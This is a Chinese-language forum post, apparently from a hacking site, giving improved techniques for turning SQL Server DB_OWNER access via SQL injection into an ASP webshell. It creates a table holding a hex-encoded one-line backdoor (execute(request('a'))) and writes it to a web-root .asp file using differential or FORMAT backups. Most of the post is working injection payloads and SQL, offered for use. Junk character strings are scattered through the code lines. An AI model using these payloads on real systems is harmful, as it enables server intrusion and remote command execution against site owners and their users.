DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

# \+ a) i8 u8 j4 X/ A减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
加一个参数WITH DIFFERENTIAL

+ {) S( k4 V. Y  J+ |$ g1
6 m8 k) Q& S, w1 z. Y2 [- U& b2
3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
1 j$ s$ n8 M" zcreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
8 @- ^/ w+ |' B5 h% t% w% M) V3 |
% B+ C. A' S7 V6 K6 h二利用完全FORMAT
加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

1
2
+ U2 N9 w6 t0 o9 U0 O3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
$ M0 T( ?! y6 ~& E- y7 Z1 v/ m% Y8 kdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

2 d! i3 A( [2 c! u总的来说就是那么简单几句,下面以备份数据库model为例子
: H1 x4 @- \- A: O9 {. J; Q) g1
$ v' j/ g, S! A+ q5 Q
! F, m' |6 {$ S$ z9 \1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2 _4 T# T8 h4 f! G; p  t
2

* q* @7 z# N( m  i' V. B- M1
id=1;backup database model to disk='你的路径‘ with differential,format;--
, A- ]/ D6 `  q( U0 i